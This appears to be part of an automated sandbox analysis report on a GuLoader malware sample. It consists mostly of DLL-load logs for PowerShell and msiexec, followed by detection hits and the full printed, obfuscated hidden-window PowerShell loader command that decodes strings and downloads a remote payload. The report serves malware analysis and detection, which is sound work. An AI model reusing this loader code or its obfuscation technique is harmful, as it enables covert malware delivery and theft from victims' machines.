                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2390118940.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbB source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdbF source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000005.00000002.2402043771.000000000A47D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391081799.00000000081E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overgun)$gLoBaL:tRaNseNna = [sYstem.tEXT.EnCoDINg]::AsCIi.geTStRIng($bAkteRIEkulTurs)$GlOBAL:nONGalaCtic=$TRAnSenNa.sUbsTriNG($hOLDinG,$sevRdiGheders)<#Arbejdsborde Practised Ofringe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Repousse $Xicak $Druesyrens), (Sagsgere @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knoklernes = [AppDomain]::CurrentDomain.GetAssemblies()$global:Madd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($skypumpens)), $Matchwoodfdryppende).DefineDynamicModule($Restaurationens, $false).DefineType($Upstanding110, $Verandaerne, [System.Mul
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overgun)$gLoBaL:tRaNseNna = [sYstem.tEXT.EnCoDINg]::AsCIi.geTStRIng($bAkteRIEkulTurs)$GlOBAL:nONGalaCtic=$TRAnSenNa.sUbsTriNG($hOLDinG,$sevRdiGheders)<#Arbejdsborde Practised Ofringe
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. ds
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecl
